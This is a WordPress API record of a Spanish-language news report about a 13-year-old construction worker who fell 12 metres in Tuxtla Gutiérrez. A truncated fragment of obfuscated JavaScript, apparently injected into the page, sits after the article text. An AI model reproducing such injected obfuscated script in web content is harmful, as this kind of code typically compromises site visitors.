{"id":4663,"date":"2022-08-24T23:22:38","date_gmt":"2022-08-24T23:22:38","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=4663"},"modified":"2022-08-24T23:22:39","modified_gmt":"2022-08-24T23:22:39","slug":"peon-de-13-anos-cae-de-una-altura-de-12-metros-mientras-laboraba-en-obra","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=4663","title":{"rendered":"Pe\u00f3n de 13 a\u00f1os cae de una altura de 12 metros mientras laboraba en  obra"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/FB_IMG_1661383125147-1024x768.jpg\" alt=\"\" class=\"wp-image-4660\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/FB_IMG_1661383125147-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/FB_IMG_1661383125147-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/FB_IMG_1661383125147-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/FB_IMG_1661383125147.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p> Jairo Camacho. Agencia ReporteCiudadano,  24 de agosto del 2022. Tuxtla Guti\u00e9rrez. Tuxtla Guti\u00e9rrez. &#8211; Un pe\u00f3n de alba\u00f1il cay\u00f3 de una altura de m\u00e1s de 12 metros mientras trabajaba en una obra particular en Tuxtla Guti\u00e9rrez.De acuerdo con los reportes oficiales se inform\u00f3  que,  el menor de 13 de edad trabaja en un edificio de la Penipak cuando de manera repentina se cay\u00f3 al vac\u00edo. Sus mismos compa\u00f1eros los ayudaron y trasladaron a un hospital para recibir atenci\u00f3n m\u00e9dica especializada. A pesar de la ca\u00edda,  Francisco &#8220;N&#8221; fue reportado como fuera de peligro. En el lugar de los hechos se guard\u00f3 hermetismo sobre lo acontecido.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 24 de agosto del 2022. Tuxtla Guti\u00e9rrez. Tuxtla Guti\u00e9rrez. &#8211; Un pe\u00f3n de alba\u00f1il cay\u00f3 de una altura de m\u00e1s de 12 metros mientras trabajaba en una obra particular en Tuxtla Guti\u00e9rrez.De acuerdo con los reportes oficiales se inform\u00f3 que, el menor de 13 de edad trabaja en un edificio de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":4660,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-4663","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4663","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4663"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4663\/revisions"}],"predecessor-version":[{"id":4664,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4663\/revisions\/4664"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/4660"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4663"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4663"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4663"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}